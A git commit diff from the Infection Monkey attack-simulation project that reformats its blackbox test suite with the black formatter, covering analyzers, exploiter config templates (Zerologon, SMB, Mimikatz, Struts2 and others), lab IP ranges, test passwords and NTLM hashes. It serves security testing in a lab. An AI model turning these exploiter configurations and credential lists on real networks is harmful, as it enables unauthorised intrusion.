Merge branch 'paint-it-black' into develop

Resolves #1070
This commit is contained in:
Mike Salvatore 2021-04-06 17:42:21 -04:00
commit 661f3907a9
493 changed files with 9615 additions and 7228 deletions

View File

@ -24,7 +24,7 @@ install:
# Python
- pip freeze
- pip install -r monkey/monkey_island/requirements.txt # for unit tests
- pip install flake8 pytest pytest-cov isort # for next stages
- pip install black flake8 pytest pytest-cov isort # for next stages
- pip install coverage # for code coverage
- pip install -r monkey/infection_monkey/requirements.txt # for unit tests
- pip install pipdeptree
@ -60,6 +60,9 @@ script:
## Check import order
- python -m isort ./monkey --settings-file ./ci_scripts/isort.cfg
## Check that all python is properly formatted. Fail otherwise.
- python -m black --check .
## Run unit tests and generate coverage data
- cd monkey # This is our source dir
- python -m pytest --cov=. # Have to use `python -m pytest` instead of `pytest` to add "{$builddir}/monkey/monkey" to sys.path.

View File

@ -16,3 +16,4 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
- `mongo_key.bin` file location can be selected at runtime. #994
- Monkey agents are stored in the configurable data_dir when monkey is "run
from the island". #997
- Reformated all code using black. #1070

View File

@ -2,7 +2,6 @@ from abc import ABCMeta, abstractmethod
class Analyzer(object, metaclass=ABCMeta):
@abstractmethod
def analyze_test_results(self) -> bool:
raise NotImplementedError()

View File

@ -2,7 +2,6 @@ LOG_INIT_MESSAGE = "Analysis didn't run."
class AnalyzerLog(object):
def __init__(self, analyzer_name):
self.contents = LOG_INIT_MESSAGE
self.name = analyzer_name

View File

@ -3,7 +3,6 @@ from envs.monkey_zoo.blackbox.analyzers.analyzer_log import AnalyzerLog
class CommunicationAnalyzer(Analyzer):
def __init__(self, island_client, machine_ips):
self.island_client = island_client
self.machine_ips = machine_ips
@ -21,5 +20,5 @@ class CommunicationAnalyzer(Analyzer):
return all_monkeys_communicated
def did_monkey_communicate_back(self, machine_ip):
query = {'ip_addresses': {'$elemMatch': {'$eq': machine_ip}}}
query = {"ip_addresses": {"$elemMatch": {"$eq": machine_ip}}}
return len(self.island_client.find_monkeys_in_db(query)) > 0

View File

@ -9,8 +9,9 @@ LOGGER = logging.getLogger(__name__)
class PerformanceAnalyzer(Analyzer):
def __init__(self, performance_test_config: PerformanceTestConfig, endpoint_timings: Dict[str, timedelta]):
def __init__(
self, performance_test_config: PerformanceTestConfig, endpoint_timings: Dict[str, timedelta]
):
self.performance_test_config = performance_test_config
self.endpoint_timings = endpoint_timings

View File

@ -3,19 +3,25 @@ from pprint import pformat
import dpath.util
from common.config_value_paths import USER_LIST_PATH, PASSWORD_LIST_PATH, NTLM_HASH_LIST_PATH, LM_HASH_LIST_PATH
from common.config_value_paths import (
USER_LIST_PATH,
PASSWORD_LIST_PATH,
NTLM_HASH_LIST_PATH,
LM_HASH_LIST_PATH,
)
from envs.monkey_zoo.blackbox.analyzers.analyzer import Analyzer
from envs.monkey_zoo.blackbox.analyzers.analyzer_log import AnalyzerLog
from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient
# Query for telemetry collection to see if password restoration was successful
TELEM_QUERY = {'telem_category': 'exploit',
'data.exploiter': 'ZerologonExploiter',
'data.info.password_restored': True}
TELEM_QUERY = {
"telem_category": "exploit",
"data.exploiter": "ZerologonExploiter",
"data.info.password_restored": True,
}
class ZerologonAnalyzer(Analyzer):
def __init__(self, island_client: MonkeyIslandClient, expected_credentials: List[str]):
self.island_client = island_client
self.expected_credentials = expected_credentials
@ -35,13 +41,12 @@ class ZerologonAnalyzer(Analyzer):
@staticmethod
def _get_relevant_credentials(config: dict):
credentials_on_island = []
credentials_on_island.extend(dpath.util.get(config['configuration'], USER_LIST_PATH))
credentials_on_island.extend(dpath.util.get(config['configuration'], NTLM_HASH_LIST_PATH))
credentials_on_island.extend(dpath.util.get(config['configuration'], LM_HASH_LIST_PATH))
credentials_on_island.extend(dpath.util.get(config["configuration"], USER_LIST_PATH))
credentials_on_island.extend(dpath.util.get(config["configuration"], NTLM_HASH_LIST_PATH))
credentials_on_island.extend(dpath.util.get(config["configuration"], LM_HASH_LIST_PATH))
return credentials_on_island
def _is_all_credentials_in_list(self,
all_creds: List[str]) -> bool:
def _is_all_credentials_in_list(self, all_creds: List[str]) -> bool:
credentials_missing = [cred for cred in self.expected_credentials if cred not in all_creds]
self._log_creds_not_gathered(credentials_missing)
return not credentials_missing
@ -60,11 +65,13 @@ class ZerologonAnalyzer(Analyzer):
def _log_credential_restore(self, telem_list: List[dict]):
if telem_list:
self.log.add_entry("Zerologon exploiter telemetry contains indicators that credentials "
"were successfully restored.")
self.log.add_entry(
"Zerologon exploiter telemetry contains indicators that credentials "
"were successfully restored."
)
else:
self.log.add_entry("Credential restore failed or credential restore "
"telemetry not found on the Monkey Island.")
self.log.add_entry(
"Credential restore failed or credential restore "
"telemetry not found on the Monkey Island."
)
self.log.add_entry(f"Query for credential restore telem: {pformat(TELEM_QUERY)}")

View File

@ -8,7 +8,9 @@ class BaseTemplate(ConfigTemplate):
"basic.exploiters.exploiter_classes": [],
"basic_network.scope.local_network_scan": False,
"internal.classes.finger_classes": ["PingScanner", "HTTPFinger"],
"internal.monkey.system_info.system_info_collector_classes":
["EnvironmentCollector", "HostnameCollector"],
"monkey.post_breach.post_breach_actions": []
"internal.monkey.system_info.system_info_collector_classes": [
"EnvironmentCollector",
"HostnameCollector",
],
"monkey.post_breach.post_breach_actions": [],
}

View File

@ -2,7 +2,6 @@ from abc import ABC, abstractmethod
class ConfigTemplate(ABC):
@property
@abstractmethod
def config_values(self) -> dict:

View File

@ -7,8 +7,10 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
class Drupal(ConfigTemplate):
config_values = copy(BaseTemplate.config_values)
config_values.update({
config_values.update(
{
"internal.classes.finger_classes": ["PingScanner", "HTTPFinger"],
"basic.exploiters.exploiter_classes": ["DrupalExploiter"],
"basic_network.scope.subnet_scan_list": ["10.2.2.28"]
})
"basic_network.scope.subnet_scan_list": ["10.2.2.28"],
}
)

View File

@ -8,8 +8,10 @@ class Elastic(ConfigTemplate):
config_values = copy(BaseTemplate.config_values)
config_values.update({
config_values.update(
{
"basic.exploiters.exploiter_classes": ["ElasticGroovyExploiter"],
"internal.classes.finger_classes": ["PingScanner", "HTTPFinger", "ElasticFinger"],
"basic_network.scope.subnet_scan_list": ["10.2.2.4", "10.2.2.5"]
})
"basic_network.scope.subnet_scan_list": ["10.2.2.4", "10.2.2.5"],
}
)

View File

@ -8,7 +8,9 @@ class Hadoop(ConfigTemplate):
config_values = copy(BaseTemplate.config_values)
config_values.update({
config_values.update(
{
"basic.exploiters.exploiter_classes": ["HadoopExploiter"],
"basic_network.scope.subnet_scan_list": ["10.2.2.2", "10.2.2.3"]
})
"basic_network.scope.subnet_scan_list": ["10.2.2.2", "10.2.2.3"],
}
)

View File

@ -7,14 +7,16 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
class Mssql(ConfigTemplate):
config_values = copy(BaseTemplate.config_values)
config_values.update({
config_values.update(
{
"basic.exploiters.exploiter_classes": ["MSSQLExploiter"],
"basic_network.scope.subnet_scan_list": ["10.2.2.16"],
"basic.credentials.exploit_password_list": ["Password1!",
"basic.credentials.exploit_password_list": [
"Password1!",
"Xk8VDTsC",
"password",
"12345678"],
"basic.credentials.exploit_user_list": ["Administrator",
"m0nk3y",
"user"]
})
"12345678",
],
"basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"],
}
)

View File

@ -3,14 +3,17 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
class Performance(ConfigTemplate):
config_values = {
"basic.credentials.exploit_password_list": ["Xk8VDTsC",
"basic.credentials.exploit_password_list": [
"Xk8VDTsC",
"^NgDvY59~8",
"Ivrrw5zEzs",
"3Q=(Ge(+&w]*",
"`))jU7L(w}",
"t67TC5ZDmz"],
"t67TC5ZDmz",
],
"basic.credentials.exploit_user_list": ["m0nk3y"],
"basic.exploiters.exploiter_classes": ["SmbExploiter",
"basic.exploiters.exploiter_classes": [
"SmbExploiter",
"WmiExploiter",
"SSHExploiter",
"ShellShockExploiter",
@ -21,16 +24,20 @@ class Performance(ConfigTemplate):
"HadoopExploiter",
"VSFTPDExploiter",
"MSSQLExploiter",
"ZerologonExploiter"],
"basic_network.network_analysis.inaccessible_subnets": ["10.2.2.0/30",
"ZerologonExploiter",
],
"basic_network.network_analysis.inaccessible_subnets": [
"10.2.2.0/30",
"10.2.2.8/30",
"10.2.2.24/32",
"10.2.2.23/32",
"10.2.2.21/32",
"10.2.2.19/32",
"10.2.2.18/32",
"10.2.2.17/32"],
"basic_network.scope.subnet_scan_list": ["10.2.2.2",
"10.2.2.17/32",
],
"basic_network.scope.subnet_scan_list": [
"10.2.2.2",
"10.2.2.3",
"10.2.2.4",
"10.2.2.5",
@ -50,5 +57,6 @@ class Performance(ConfigTemplate):
"10.2.2.21",
"10.2.2.23",
"10.2.2.24",
"10.2.2.25"]
"10.2.2.25",
],
}

View File

@ -7,7 +7,9 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
class ShellShock(ConfigTemplate):
config_values = copy(BaseTemplate.config_values)
config_values.update({
config_values.update(
{
"basic.exploiters.exploiter_classes": ["ShellShockExploiter"],
"basic_network.scope.subnet_scan_list": ["10.2.2.8"]
})
"basic_network.scope.subnet_scan_list": ["10.2.2.8"],
}
)

View File

@ -7,14 +7,18 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
class SmbMimikatz(ConfigTemplate):
config_values = copy(BaseTemplate.config_values)
config_values.update({
config_values.update(
{
"basic.exploiters.exploiter_classes": ["SmbExploiter"],
"basic_network.scope.subnet_scan_list": ["10.2.2.14", "10.2.2.15"],
"basic.credentials.exploit_password_list": ["Password1!", "Ivrrw5zEzs"],
"basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"],
"internal.classes.finger_classes": ["SMBFinger", "PingScanner", "HTTPFinger"],
"monkey.system_info.system_info_collector_classes": ["EnvironmentCollector",
"monkey.system_info.system_info_collector_classes": [
"EnvironmentCollector",
"HostnameCollector",
"ProcessListCollector",
"MimikatzCollector"]
})
"MimikatzCollector",
],
}
)

View File

@ -11,12 +11,10 @@ class SmbPth(ConfigTemplate):
"basic.exploiters.exploiter_classes": ["SmbExploiter"],
"basic_network.scope.subnet_scan_list": ["10.2.2.15"],
"basic.credentials.exploit_password_list": ["Password1!", "Ivrrw5zEzs"],
"basic.credentials.exploit_user_list": ["Administrator",
"m0nk3y",
"user"],
"internal.classes.finger_classes": ["SMBFinger",
"PingScanner",
"HTTPFinger"],
"internal.classes.exploits.exploit_ntlm_hash_list": ["5da0889ea2081aa79f6852294cba4a5e",
"50c9987a6bf1ac59398df9f911122c9b"]
"basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"],
"internal.classes.finger_classes": ["SMBFinger", "PingScanner", "HTTPFinger"],
"internal.classes.exploits.exploit_ntlm_hash_list": [
"5da0889ea2081aa79f6852294cba4a5e",
"50c9987a6bf1ac59398df9f911122c9b",
],
}

View File

@ -7,17 +7,12 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
class Ssh(ConfigTemplate):
config_values = copy(BaseTemplate.config_values)
config_values.update({
config_values.update(
{
"basic.exploiters.exploiter_classes": ["SSHExploiter"],
"basic_network.scope.subnet_scan_list": ["10.2.2.11",
"10.2.2.12"],
"basic.credentials.exploit_password_list": ["Password1!",
"12345678",
"^NgDvY59~8"],
"basic.credentials.exploit_user_list": ["Administrator",
"m0nk3y",
"user"],
"internal.classes.finger_classes": ["SSHFinger",
"PingScanner",
"HTTPFinger"]
})
"basic_network.scope.subnet_scan_list": ["10.2.2.11", "10.2.2.12"],
"basic.credentials.exploit_password_list": ["Password1!", "12345678", "^NgDvY59~8"],
"basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"],
"internal.classes.finger_classes": ["SSHFinger", "PingScanner", "HTTPFinger"],
}
)

View File

@ -8,7 +8,9 @@ class Struts2(ConfigTemplate):
config_values = copy(BaseTemplate.config_values)
config_values.update({
config_values.update(
{
"basic.exploiters.exploiter_classes": ["Struts2Exploiter"],
"basic_network.scope.subnet_scan_list": ["10.2.2.23", "10.2.2.24"]
})
"basic_network.scope.subnet_scan_list": ["10.2.2.23", "10.2.2.24"],
}
)

View File

@ -7,27 +7,30 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
class Tunneling(ConfigTemplate):
config_values = copy(BaseTemplate.config_values)
config_values.update({
"basic.exploiters.exploiter_classes": ["SmbExploiter",
"WmiExploiter",
"SSHExploiter"
],
"basic_network.scope.subnet_scan_list": ["10.2.2.9",
config_values.update(
{
"basic.exploiters.exploiter_classes": ["SmbExploiter", "WmiExploiter", "SSHExploiter"],
"basic_network.scope.subnet_scan_list": [
"10.2.2.9",
"10.2.1.10",
"10.2.0.11",
"10.2.0.12"],
"10.2.0.12",
],
"basic_network.scope.depth": 3,
"internal.general.keep_tunnel_open_time": 180,
"basic.credentials.exploit_password_list": ["Password1!",
"basic.credentials.exploit_password_list": [
"Password1!",
"3Q=(Ge(+&w]*",
"`))jU7L(w}",
"t67TC5ZDmz",
"12345678"],
"basic.credentials.exploit_user_list": ["Administrator",
"m0nk3y",
"user"],
"internal.classes.finger_classes": ["SSHFinger",
"12345678",
],
"basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"],
"internal.classes.finger_classes": [
"SSHFinger",
"PingScanner",
"HTTPFinger",
"SMBFinger"]
})
"SMBFinger",
],
}
)

View File

@ -8,7 +8,9 @@ class Weblogic(ConfigTemplate):
config_values = copy(BaseTemplate.config_values)
config_values.update({
config_values.update(
{
"basic.exploiters.exploiter_classes": ["WebLogicExploiter"],
"basic_network.scope.subnet_scan_list": ["10.2.2.18", "10.2.2.19"]
})
"basic_network.scope.subnet_scan_list": ["10.2.2.18", "10.2.2.19"],
}
)

View File

@ -7,17 +7,17 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
class WmiMimikatz(ConfigTemplate):
config_values = copy(BaseTemplate.config_values)
config_values.update({
config_values.update(
{
"basic.exploiters.exploiter_classes": ["WmiExploiter"],
"basic_network.scope.subnet_scan_list": ["10.2.2.14",
"10.2.2.15"],
"basic.credentials.exploit_password_list": ["Password1!",
"Ivrrw5zEzs"],
"basic.credentials.exploit_user_list": ["Administrator",
"m0nk3y",
"user"],
"monkey.system_info.system_info_collector_classes": ["EnvironmentCollector",
"basic_network.scope.subnet_scan_list": ["10.2.2.14", "10.2.2.15"],
"basic.credentials.exploit_password_list": ["Password1!", "Ivrrw5zEzs"],
"basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"],
"monkey.system_info.system_info_collector_classes": [
"EnvironmentCollector",
"HostnameCollector",
"ProcessListCollector",
"MimikatzCollector"]
})
"MimikatzCollector",
],
}
)

View File

@ -8,9 +8,11 @@ class Zerologon(ConfigTemplate):
config_values = copy(BaseTemplate.config_values)
config_values.update({
config_values.update(
{
"basic.exploiters.exploiter_classes": ["ZerologonExploiter"],
"basic_network.scope.subnet_scan_list": ["10.2.2.25"],
# Empty list to make sure ZeroLogon adds "Administrator" username
"basic.credentials.exploit_user_list": []
})
"basic.credentials.exploit_user_list": [],
}
)

View File

@ -2,25 +2,37 @@ import pytest
def pytest_addoption(parser):
parser.addoption("--island", action="store", default="",
help="Specify the Monkey Island address (host+port).")
parser.addoption("--no-gcp", action="store_true", default=False,
help="Use for no interaction with the cloud.")
parser.addoption("--quick-performance-tests", action="store_true", default=False,
parser.addoption(
"--island",
action="store",
default="",
help="Specify the Monkey Island address (host+port).",
)
parser.addoption(
"--no-gcp",
action="store_true",
default=False,
help="Use for no interaction with the cloud.",
)
parser.addoption(
"--quick-performance-tests",
action="store_true",
default=False,
help="If enabled performance tests won't reset island and won't send telemetries, "
"instead will just test performance of already present island state.")
"instead will just test performance of already present island state.",
)
@pytest.fixture(scope='session')
@pytest.fixture(scope="session")
def island(request):
return request.config.getoption("--island")
@pytest.fixture(scope='session')
@pytest.fixture(scope="session")
def no_gcp(request):
return request.config.getoption("--no-gcp")
@pytest.fixture(scope='session')
@pytest.fixture(scope="session")
def quick_performance_tests(request):
return request.config.getoption("--quick-performance-tests")

View File

@ -8,23 +8,22 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp
class IslandConfigParser:
@staticmethod
def get_raw_config(config_template: Type[ConfigTemplate],
island_client: MonkeyIslandClient) -> str:
def get_raw_config(
config_template: Type[ConfigTemplate], island_client: MonkeyIslandClient
) -> str:
response = island_client.get_config()
config = IslandConfigParser.apply_template_to_config(config_template, response['configuration'])
config = IslandConfigParser.apply_template_to_config(
config_template, response["configuration"]
)
return json.dumps(config)
@staticmethod
def apply_template_to_config(config_template: Type[ConfigTemplate],
config: dict) -> dict:
def apply_template_to_config(config_template: Type[ConfigTemplate], config: dict) -> dict:
for path, value in config_template.config_values.items():
dpath.util.set(config, path, value, '.')
dpath.util.set(config, path, value, ".")
return config
@staticmethod
def get_ips_of_targets(raw_config):
return dpath.util.get(json.loads(raw_config),
"basic_network.scope.subnet_scan_list",
'.')
return dpath.util.get(json.loads(raw_config), "basic_network.scope.subnet_scan_list", ".")

View File

@ -8,9 +8,9 @@ from bson import json_util
from envs.monkey_zoo.blackbox.island_client.monkey_island_requests import MonkeyIslandRequests
SLEEP_BETWEEN_REQUESTS_SECONDS = 0.5
MONKEY_TEST_ENDPOINT = 'api/test/monkey'
TELEMETRY_TEST_ENDPOINT = 'api/test/telemetry'
LOG_TEST_ENDPOINT = 'api/test/log'
MONKEY_TEST_ENDPOINT = "api/test/monkey"
TELEMETRY_TEST_ENDPOINT = "api/test/telemetry"
LOG_TEST_ENDPOINT = "api/test/log"
LOGGER = logging.getLogger(__name__)
@ -44,7 +44,7 @@ class MonkeyIslandClient(object):
@staticmethod
def monkey_ran_successfully(response):
return response.ok and json.loads(response.content)['is_running']
return response.ok and json.loads(response.content)["is_running"]
@avoid_race_condition
def kill_all_monkeys(self):
@ -65,37 +65,41 @@ class MonkeyIslandClient(object):
def find_monkeys_in_db(self, query):
if query is None:
raise TypeError
response = self.requests.get(MONKEY_TEST_ENDPOINT,
MonkeyIslandClient.form_find_query_for_request(query))
response = self.requests.get(
MONKEY_TEST_ENDPOINT, MonkeyIslandClient.form_find_query_for_request(query)
)
return MonkeyIslandClient.get_test_query_results(response)
def find_telems_in_db(self, query: dict):
if query is None:
raise TypeError
response = self.requests.get(TELEMETRY_TEST_ENDPOINT,
MonkeyIslandClient.form_find_query_for_request(query))
response = self.requests.get(
TELEMETRY_TEST_ENDPOINT, MonkeyIslandClient.form_find_query_for_request(query)
)
return MonkeyIslandClient.get_test_query_results(response)
def get_all_monkeys_from_db(self):
response = self.requests.get(MONKEY_TEST_ENDPOINT,
MonkeyIslandClient.form_find_query_for_request(None))
response = self.requests.get(
MONKEY_TEST_ENDPOINT, MonkeyIslandClient.form_find_query_for_request(None)
)
return MonkeyIslandClient.get_test_query_results(response)
def find_log_in_db(self, query):
response = self.requests.get(LOG_TEST_ENDPOINT,
MonkeyIslandClient.form_find_query_for_request(query))
response = self.requests.get(
LOG_TEST_ENDPOINT, MonkeyIslandClient.form_find_query_for_request(query)
)
return MonkeyIslandClient.get_test_query_results(response)
@staticmethod
def form_find_query_for_request(query: Union[dict, None]) -> dict:
return {'find_query': json_util.dumps(query)}
return {"find_query": json_util.dumps(query)}
@staticmethod
def get_test_query_results(response):
return json.loads(response.content)['results']
return json.loads(response.content)["results"]
def is_all_monkeys_dead(self):
query = {'dead': False}
query = {"dead": False}
return len(self.find_monkeys_in_db(query)) == 0
def clear_caches(self):

View File

@ -8,8 +8,10 @@ import requests
from envs.monkey_zoo.blackbox.island_client.supported_request_method import SupportedRequestMethod
# SHA3-512 of '1234567890!@#$%^&*()_nothing_up_my_sleeve_1234567890!@#$%^&*()'
NO_AUTH_CREDS = '55e97c9dcfd22b8079189ddaeea9bce8125887e3237b800c6176c9afa80d2062' \
'8d2c8d0b1538d2208c1444ac66535b764a3d902b35e751df3faec1e477ed3557'
NO_AUTH_CREDS = (
"55e97c9dcfd22b8079189ddaeea9bce8125887e3237b800c6176c9afa80d2062"
"8d2c8d0b1538d2208c1444ac66535b764a3d902b35e751df3faec1e477ed3557"
)
LOGGER = logging.getLogger(__name__)
@ -18,10 +20,12 @@ class MonkeyIslandRequests(object):
def __init__(self, server_address):
self.addr = "https://{IP}/".format(IP=server_address)
self.token = self.try_get_jwt_from_server()
self.supported_request_methods = {SupportedRequestMethod.GET: self.get,
self.supported_request_methods = {
SupportedRequestMethod.GET: self.get,
SupportedRequestMethod.POST: self.post,
SupportedRequestMethod.PATCH: self.patch,
SupportedRequestMethod.DELETE: self.delete}
SupportedRequestMethod.DELETE: self.delete,
}
def get_request_time(self, url, method: SupportedRequestMethod, data=None):
response = self.send_request_by_method(url, method, data)
@ -44,7 +48,10 @@ class MonkeyIslandRequests(object):
return self.get_jwt_from_server()
except requests.ConnectionError as err:
LOGGER.error(
"Unable to connect to island, aborting! Error information: {}. Server: {}".format(err, self.addr))
"Unable to connect to island, aborting! Error information: {}. Server: {}".format(
err, self.addr
)
)
assert False
class _Decorators:
@ -59,45 +66,45 @@ class MonkeyIslandRequests(object):
return request_function_wrapper
def get_jwt_from_server(self):
resp = requests.post(self.addr + "api/auth", # noqa: DUO123
resp = requests.post(
self.addr + "api/auth", # noqa: DUO123
json={"username": NO_AUTH_CREDS, "password": NO_AUTH_CREDS},
verify=False)
verify=False,
)
return resp.json()["access_token"]
@_Decorators.refresh_jwt_token
def get(self, url, data=None):
return requests.get(self.addr + url, # noqa: DUO123
return requests.get(
self.addr + url, # noqa: DUO123
headers=self.get_jwt_header(),
params=data,
verify=False)
verify=False,
)
@_Decorators.refresh_jwt_token
def post(self, url, data):
return requests.post(self.addr + url, # noqa: DUO123
data=data,
headers=self.get_jwt_header(),
verify=False)
return requests.post(
self.addr + url, data=data, headers=self.get_jwt_header(), verify=False # noqa: DUO123
)
@_Decorators.refresh_jwt_token
def post_json(self, url, data: Dict):
return requests.post(self.addr + url, # noqa: DUO123
json=data,
headers=self.get_jwt_header(),
verify=False)
return requests.post(
self.addr + url, json=data, headers=self.get_jwt_header(), verify=False # noqa: DUO123
)
@_Decorators.refresh_jwt_token
def patch(self, url, data: Dict):
return requests.patch(self.addr + url, # noqa: DUO123
data=data,
headers=self.get_jwt_header(),
verify=False)
return requests.patch(
self.addr + url, data=data, headers=self.get_jwt_header(), verify=False # noqa: DUO123
)
@_Decorators.refresh_jwt_token
def delete(self, url):
return requests.delete( # noqa: DOU123
self.addr + url,
headers=self.get_jwt_header(),
verify=False)
self.addr + url, headers=self.get_jwt_header(), verify=False
)
@_Decorators.refresh_jwt_token
def get_jwt_header(self):

View File

@ -12,16 +12,16 @@ class MonkeyLog(object):
self.log_dir_path = log_dir_path
def download_log(self, island_client):
log = island_client.find_log_in_db({'monkey_id': ObjectId(self.monkey['id'])})
log = island_client.find_log_in_db({"monkey_id": ObjectId(self.monkey["id"])})
if not log:
LOGGER.error("Log for monkey {} not found".format(self.monkey['ip_addresses'][0]))
LOGGER.error("Log for monkey {} not found".format(self.monkey["ip_addresses"][0]))
return False
else:
self.write_log_to_file(log)
return True
def write_log_to_file(self, log):
with open(self.get_log_path_for_monkey(self.monkey), 'w') as log_file:
with open(self.get_log_path_for_monkey(self.monkey), "w") as log_file:
log_file.write(MonkeyLog.parse_log(log))
@staticmethod
@ -32,7 +32,7 @@ class MonkeyLog(object):
@staticmethod
def get_filename_for_monkey_log(monkey):
return "{}.txt".format(monkey['ip_addresses'][0])
return "{}.txt".format(monkey["ip_addresses"][0])
def get_log_path_for_monkey(self, monkey):
return os.path.join(self.log_dir_path, MonkeyLog.get_filename_for_monkey_log(monkey))

View File

@ -5,13 +5,12 @@ LOGGER = logging.getLogger(__name__)
class MonkeyLogParser(object):
def __init__(self, log_path):
self.log_path = log_path
self.log_contents = self.read_log()
def read_log(self):
with open(self.log_path, 'r') as log:
with open(self.log_path, "r") as log:
return log.read()
def print_errors(self):

View File

@ -6,7 +6,6 @@ LOGGER = logging.getLogger(__name__)
class MonkeyLogsDownloader(object):
def __init__(self, island_client, log_dir_path):
self.island_client = island_client
self.log_dir_path = log_dir_path

View File

@ -5,7 +5,7 @@ import shutil
from envs.monkey_zoo.blackbox.log_handlers.monkey_log_parser import MonkeyLogParser
from envs.monkey_zoo.blackbox.log_handlers.monkey_logs_downloader import MonkeyLogsDownloader
LOG_DIR_NAME = 'logs'
LOG_DIR_NAME = "logs"
LOGGER = logging.getLogger(__name__)
@ -18,8 +18,10 @@ class TestLogsHandler(object):
def parse_test_logs(self):
log_paths = self.download_logs()
if not log_paths:
LOGGER.error("No logs were downloaded. Maybe no monkeys were ran "
"or early exception prevented log download?")
LOGGER.error(
"No logs were downloaded. Maybe no monkeys were ran "
"or early exception prevented log download?"
)
return
TestLogsHandler.parse_logs(log_paths)

View File

@ -5,13 +5,10 @@ from time import sleep
import pytest
from typing_extensions import Type
from envs.monkey_zoo.blackbox.analyzers.communication_analyzer import \
CommunicationAnalyzer
from envs.monkey_zoo.blackbox.analyzers.communication_analyzer import CommunicationAnalyzer
from envs.monkey_zoo.blackbox.analyzers.zerologon_analyzer import ZerologonAnalyzer
from envs.monkey_zoo.blackbox.island_client.island_config_parser import \
IslandConfigParser
from envs.monkey_zoo.blackbox.island_client.monkey_island_client import \
MonkeyIslandClient
from envs.monkey_zoo.blackbox.island_client.island_config_parser import IslandConfigParser
from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient
from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate
from envs.monkey_zoo.blackbox.config_templates.drupal import Drupal
from envs.monkey_zoo.blackbox.config_templates.elastic import Elastic
@ -28,33 +25,51 @@ from envs.monkey_zoo.blackbox.config_templates.weblogic import Weblogic
from envs.monkey_zoo.blackbox.config_templates.wmi_mimikatz import WmiMimikatz
from envs.monkey_zoo.blackbox.config_templates.wmi_pth import WmiPth
from envs.monkey_zoo.blackbox.config_templates.zerologon import Zerologon
from envs.monkey_zoo.blackbox.log_handlers.test_logs_handler import \
TestLogsHandler
from envs.monkey_zoo.blackbox.log_handlers.test_logs_handler import TestLogsHandler
from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest
from envs.monkey_zoo.blackbox.tests.performance.map_generation import \
MapGenerationTest
from envs.monkey_zoo.blackbox.tests.performance.map_generation_from_telemetries import \
MapGenerationFromTelemetryTest
from envs.monkey_zoo.blackbox.tests.performance.report_generation import \
ReportGenerationTest
from envs.monkey_zoo.blackbox.tests.performance.report_generation_from_telemetries import \
ReportGenerationFromTelemetryTest
from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test import \
TelemetryPerformanceTest
from envs.monkey_zoo.blackbox.tests.performance.map_generation import MapGenerationTest
from envs.monkey_zoo.blackbox.tests.performance.map_generation_from_telemetries import (
MapGenerationFromTelemetryTest,
)
from envs.monkey_zoo.blackbox.tests.performance.report_generation import ReportGenerationTest
from envs.monkey_zoo.blackbox.tests.performance.report_generation_from_telemetries import (
ReportGenerationFromTelemetryTest,
)
from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test import (
TelemetryPerformanceTest,
)
from envs.monkey_zoo.blackbox.utils import gcp_machine_handlers
DEFAULT_TIMEOUT_SECONDS = 5 * 60
MACHINE_BOOTUP_WAIT_SECONDS = 30
GCP_TEST_MACHINE_LIST = ['sshkeys-11', 'sshkeys-12', 'elastic-4', 'elastic-5', 'hadoop-2', 'hadoop-3', 'mssql-16',
'mimikatz-14', 'mimikatz-15', 'struts2-23', 'struts2-24', 'tunneling-9', 'tunneling-10',
'tunneling-11', 'tunneling-12', 'weblogic-18', 'weblogic-19', 'shellshock-8', 'zerologon-25',
'drupal-28']
GCP_TEST_MACHINE_LIST = [
"sshkeys-11",
"sshkeys-12",
"elastic-4",
"elastic-5",
"hadoop-2",
"hadoop-3",
"mssql-16",
"mimikatz-14",
"mimikatz-15",
"struts2-23",
"struts2-24",
"tunneling-9",
"tunneling-10",
"tunneling-11",
"tunneling-12",
"weblogic-18",
"weblogic-19",
"shellshock-8",
"zerologon-25",
"drupal-28",
]
LOG_DIR_PATH = "./logs"
logging.basicConfig(level=logging.INFO)
LOGGER = logging.getLogger(__name__)
@pytest.fixture(autouse=True, scope='session')
@pytest.fixture(autouse=True, scope="session")
def GCPHandler(request, no_gcp):
if not no_gcp:
GCPHandler = gcp_machine_handlers.GCPHandler()
@ -67,7 +82,7 @@ def GCPHandler(request, no_gcp):
request.addfinalizer(fin)
@pytest.fixture(autouse=True, scope='session')
@pytest.fixture(autouse=True, scope="session")
def delete_logs():
LOGGER.info("Deleting monkey logs before new tests.")
TestLogsHandler.delete_log_folder_contents(TestMonkeyBlackbox.get_log_dir_path())
@ -77,7 +92,7 @@ def wait_machine_bootup():
sleep(MACHINE_BOOTUP_WAIT_SECONDS)
@pytest.fixture(scope='class')
@pytest.fixture(scope="class")
def island_client(island, quick_performance_tests):
island_client_object = MonkeyIslandClient(island)
if not quick_performance_tests:
@ -85,41 +100,55 @@ def island_client(island, quick_performance_tests):
yield island_client_object
@pytest.mark.usefixtures('island_client')
@pytest.mark.usefixtures("island_client")
# noinspection PyUnresolvedReferences
class TestMonkeyBlackbox:
@staticmethod
def run_exploitation_test(island_client: MonkeyIslandClient,
def run_exploitation_test(
island_client: MonkeyIslandClient,
config_template: Type[ConfigTemplate],
test_name: str,
timeout_in_seconds=DEFAULT_TIMEOUT_SECONDS):
timeout_in_seconds=DEFAULT_TIMEOUT_SECONDS,
):
raw_config = IslandConfigParser.get_raw_config(config_template, island_client)
